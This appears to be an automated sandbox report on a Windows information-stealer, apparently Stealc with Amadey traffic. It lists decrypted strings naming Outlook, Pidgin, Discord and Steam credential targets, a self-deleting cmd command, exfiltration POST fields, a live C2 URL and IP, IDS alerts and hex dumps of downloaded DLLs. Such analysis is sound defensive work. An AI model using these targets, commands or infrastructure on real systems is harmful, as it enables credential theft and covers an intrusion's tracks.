Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.610000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.610000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: done
Source: 0.2.file.exe.610000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.610000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: https
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.610000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.610000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.610000.0.unpack	String decryptor: build
Source: 0.2.file.exe.610000.0.unpack	String decryptor: token
Source: 0.2.file.exe.610000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.610000.0.unpack	String decryptor: file
Source: 0.2.file.exe.610000.0.unpack	String decryptor: message
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.610000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CB9A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB944C0 PK11_PubEncrypt,	0_2_6CB944C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB64420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CB64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB94440 PK11_PrivDecrypt,	0_2_6CB94440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CBE25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CB7E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CB78670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CB9A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CBBA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CBC0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB943B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CB943B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CBB7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CBBBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB77D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CB77D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CBB9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93FF0 PK11_PrivDecryptPKCS1,	0_2_6CB93FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CB93850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB99840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CB99840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CBBDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CB93560

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49734 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49741 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49744 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49745

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 